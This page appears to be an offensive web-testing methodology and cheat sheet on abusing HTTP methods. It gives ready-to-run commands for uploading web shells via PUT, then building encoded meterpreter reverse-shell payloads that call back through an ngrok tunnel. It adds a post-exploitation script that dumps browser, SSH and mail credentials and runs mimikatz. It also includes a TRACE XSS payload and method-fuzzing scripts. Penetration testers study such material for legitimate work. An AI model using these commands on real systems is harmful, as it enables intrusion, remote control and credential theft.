HTTP Methods
Check List
Methodology
HTTP Methods
We run the following command with the curl tool to identify which HTTP methods are enabled on the target.
The same enumeration can also be done with the Nmap tool.
We can also use the Nmap tool to identify the methods enabled on the target. After running it, if the PUT method is enabled on the target, the next command attempts to upload a PHP file to the target in order to obtain RCE.
If the file ends up at the specified path after the PUT request, the site is vulnerable.
XSS in Trace Method (Black Box)
First, check whether the server supports TRACE: send a simple TRACE request and see whether the server responds to it.
If the server supports the TRACE method, the next step is to inject JavaScript code.
Modify the request by placing an XSS payload inside the Via header. If the server reflects this payload in its response without sanitization, it may be vulnerable to XSS.
Cheat Sheet
Discover the Supported Methods
curl -X OPTIONS -I $WEBSITEcurl -X PUT -d "<?php phpinfo(); ?>" $WEBSITE/phpinfo.phpnmap -sS -sV --mtu 5000 --script http-methods $WEBSITEPUT Method
weevely generate 00980098 /tmp/unk9vvn.phpcp /usr/share/webshells/aspx/cmdasp.aspx /tmp/unk9vvn.aspxcurl -X PUT $WEBSITE/uploads/index.php \
--upload-file /tmp/unk9vvn.php \
-H "Content-Type: application/x-php"weevely "$WEBSITE/uploads/index.php" 00980098curl -X PUT $WEBSITE/uploads/index.aspx \
--upload-file /tmp/unk9vvn.aspx \
-H "Content-Type: application/x-aspx"curl "$WEBSITE/uploads/index.aspx?cmd=whoami"msfconsole -qx "
use auxiliary/scanner/http/options;
set RHOSTS $WEBSITE;
set RPORT 443;
set SSL true;
run -j"msfconsole -qx "
use auxiliary/scanner/http/http_put;
set RHOSTS $WEBSITE;
set RPORT 443;
set SSL true;
set PATH /uploads;
run -j"nohup ngrok tcp 4444 >/dev/null 2>&1 &NGINFO=$(curl --silent --show-error http://127.0.0.1:4040/api/tunnels); \
NGHOST=$(echo "$NGINFO" | sed -nE 's/.*public_url":"tcp:\/\/([^"]*):.*/\1/p'); \
NGPORT=$(echo "$NGINFO" | sed -nE 's/.*public_url":"tcp:\/\/.*.tcp.*.ngrok.io:([^"]*).*/\1/p')rm -rf /home/$USER/.msf4/loot/*
msfconsole -qx "
use auxiliary/gather/impersonate_ssl;
set RHOSTS google.com;
run;
exit"cat > /tmp/post-exp.rc << EOF
getprivs
getsystem
run multi/gather/firefox_creds DECRYPT=true
run multi/gather/filezilla_client_cred
run multi/gather/ssh_creds
run multi/gather/thunderbird_creds
run multi/gather/wlan_geolocate
mimikatz
privilege::debug
sekurlsa::logonpasswords
lsadump::sam
bg
EOFmsfvenom -p php/meterpreter/reverse_tcp \
LHOST=$NGHOST \
PORT=$NGPORT \
EnableStageEncoding=true \
-f raw \
-e php/base64 -i 3 \
-o /tmp/unk9vvn.php
sed -i "s#eval#<?php eval#g" /tmp/unk9vvn.php
sed -i "s#));#)); ?>#g" /tmp/unk9vvn.phpmsfvenom -p windows/meterpreter/reverse_winhttps \
LHOST=$NGHOST \
PORT=$NGPORT \
EnableStageEncoding=true \
-f asp > /tmp/unk9vvn.aspxmsfconsole -qx "
use multi/handler;
set PAYLOAD php/meterpreter/reverse_tcp;
set LHOST $NGHOST;
set LPORT $NGPORT;
set ReverseListenerBindAddress 127.0.0.1;
set ReverseListenerBindPort 4444;
set StageEncoder true;
set AutoRunScript /tmp/post-exp.rc;
run -j"msfconsole -qx "
use multi/handler;
set PAYLOAD windows/meterpreter/reverse_winhttps;
set LHOST $NGHOST;
set LPORT $NGPORT;
set ReverseListenerBindAddress 127.0.0.1;
set ReverseListenerBindPort 4444;
set StageEncoder true;
set AutoRunScript /tmp/post-exp.rc;
run -j"curl -X PUT $WEBSITE/wp-content/uploads/index.php \
--upload-file /tmp/unk9vvn.php \
-H "Content-Type: application/x-php"Access Control Bypass
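sudo nano http-methods-fuzzer.sh
#!/bin/bash
# http-methods-fuzzer.sh
#
# Crawls the given site with katana, then uses ffuf to send every HTTP method
# in the list below to each discovered URL combined with a directory wordlist,
# reporting pairs that answer 200. An endpoint that returns 200 to a method it
# should not serve (e.g. PUT/DELETE on a static path) points at missing
# method-level access control; the fix on the server side is to restrict the
# allowed methods per route.
#
# Usage:    ./http-methods-fuzzer.sh <WEBSITE>
#           WEBSITE must start with http:// or https://
# Requires: katana, ffuf, curl, gawk (IGNORECASE is a gawk extension) and
#           /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
# Note:     PUT, DELETE and PATCH are state-changing requests and ffuf sends
#           them to every URL/DIR pair it generates.
if [ "$#" -ne 1 ]; then
  printf 'Usage: %s <WEBSITE>\n' "$0" >&2
  exit 1
fi
WEBSITE="$1"
# Validate URL format
if ! [[ "$WEBSITE" =~ ^https?:// ]]; then
  printf 'Error: WEBSITE must start with http:// or https://\n' >&2
  exit 1
fi
# Create temporary files. mktemp is used for the methods list as well, so the
# script no longer writes to the predictable, world-shared path /tmp/methods.txt.
KATANA_OUTPUT=$(mktemp)
URLS_FILE=$(mktemp)
METHODS_FILE=$(mktemp)
# Cleanup function: removes every temp file on any exit path (trap below)
cleanup()
{
  rm -f "$KATANA_OUTPUT" "$URLS_FILE" "$METHODS_FILE"
}
trap cleanup EXIT
# Run katana to gather URLs (WEBSITE is quoted so a URL containing shell
# metacharacters such as '&' or '?' cannot be split or globbed)
katana -u "$WEBSITE" \
  -fr "(static|assets|img|images|css|fonts|icons)/" \
  -o "$KATANA_OUTPUT" \
  -xhr-extraction \
  -automatic-form-fill \
  -silent \
  -strategy breadth-first \
  -js-crawl \
  -extension-filter jpg,jpeg,png,gif,bmp,tiff,tif,webp,svg,ico,css \
  -headless --no-sandbox \
  -known-files all \
  -field url \
  -sf url
# Filter and clean extracted URLs: drop query strings, .aspx suffixes and
# trailing *.json components, then drop .js files and anything with '&'
sed -E 's/\?.*//; s/\.aspx$//; s/\/[^/]+\.json$//' "$KATANA_OUTPUT" | grep -Ev '\.js$|&' | sort -u > "$URLS_FILE"
# User-Agent and headers sent with every ffuf request
USER_AGENT="Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
HEADERS=(
  "User-Agent: $USER_AGENT"
  "Accept: */*"
  "Accept-Language: en-US,fa-IR;q=0.5"
  "Accept-Encoding: gzip, deflate, br, zstd"
  "Connection: keep-alive"
  "Upgrade-Insecure-Requests: 1"
  "Sec-Fetch-Dest: script"
  "Sec-Fetch-Mode: no-cors"
  "Sec-Fetch-Site: cross-site"
  "DNT: 1"
  "Sec-GPC: 1"
  "Priority: u=0, i"
  "Te: trailers"
)
# Extract cookies: take the name=value part of each Set-Cookie header from the
# first response (CRs from the CRLF line endings are stripped) and join them as
# "a=1; b=2". The previous tr '\n' '; ' only ever inserted ';' and left a
# trailing separator that the following sed could not remove.
mapfile -t COOKIE_PAIRS < <(curl -s -I "$WEBSITE" \
  | tr -d '\r' \
  | awk 'BEGIN {IGNORECASE=1} /^set-cookie:/ {print substr($0, 13)}' \
  | awk -F';' '{print $1}')
COOKIES=""
if (( ${#COOKIE_PAIRS[@]} > 0 )); then
  COOKIES=$(printf '%s; ' "${COOKIE_PAIRS[@]}")
  COOKIES=${COOKIES%; }
fi
# Append cookies if available
if [[ -n "$COOKIES" ]]; then
  HEADERS+=("Cookie: $COOKIES")
fi
# Convert headers into ffuf parameters (-H <header> per entry)
HEADER_PARAMS=()
for HEADER in "${HEADERS[@]}"; do
  HEADER_PARAMS+=("-H" "$HEADER")
done
# Methods wordlist, one per line (printf instead of the non-portable echo -e)
printf '%s\n' GET POST PUT DELETE HEAD OPTIONS TRACE CONNECT PATCH > "$METHODS_FILE"
# Run ffuf: every URL x DIR x METHOD combination, follow redirects (-r),
# colourise (-c), report only 200 responses (-mc 200)
ffuf -w "$URLS_FILE":URL \
  -w "$METHODS_FILE":METHODS \
  -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt:DIR \
  -u URL/DIR \
  -X METHODS \
  -r -c -mc 200 \
  "${HEADER_PARAMS[@]}"
sudo chmod +x http-methods-fuzzer.sh; sudo ./http-methods-fuzzer.sh "$WEBSITE"
Cross-Site Tracing Potential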
ffuf -w /tmp/urls.txt:URL \
-w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt:DIR \
-u URL/DIR \
-X TRACE \
-H "Custom-Test-Header: <scipt>alert('unk9vvn')</script>" \
-r -c -mc 200 -mr "unk9vvn"HTTP Method Overriding
echo -e "GET\nPOST\nPUT\nDELETE\nHEAD\nOPTIONS\nTRACE\nCONNECT\nPATCH" > /tmp/methods.txt; \
ffuf -w /tmp/methods.txt:METHODS \
-w /tmp/urls.txt:URL \
-w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt:DIR \
-u URL/DIR \
-X METHODS \
-H "X-HTTP-Method: METHODS" \
-r -c -mc 200echo -e "GET\nPOST\nPUT\nDELETE\nHEAD\nOPTIONS\nTRACE\nCONNECT\nPATCH" > /tmp/methods.txt; \
ffuf -w /tmp/methods.txt:METHODS \
-w /tmp/urls.txt:URL \
-w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt:DIR \
-u URL/DIR \
-X METHODS \
-H "X-HTTP-Method-Override: METHODS" \
-r -c -mc 200echo -e "GET\nPOST\nPUT\nDELETE\nHEAD\nOPTIONS\nTRACE\nCONNECT\nPATCH" > /tmp/methods.txt; \
ffuf -w /tmp/methods.txt:METHODS \
-w /tmp/urls.txt:URL \
-w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt:DIR \
-u URL/DIR \
-X METHODS \
-H "X-Method-Override: METHODS" \
-r -c -mc 200Last updated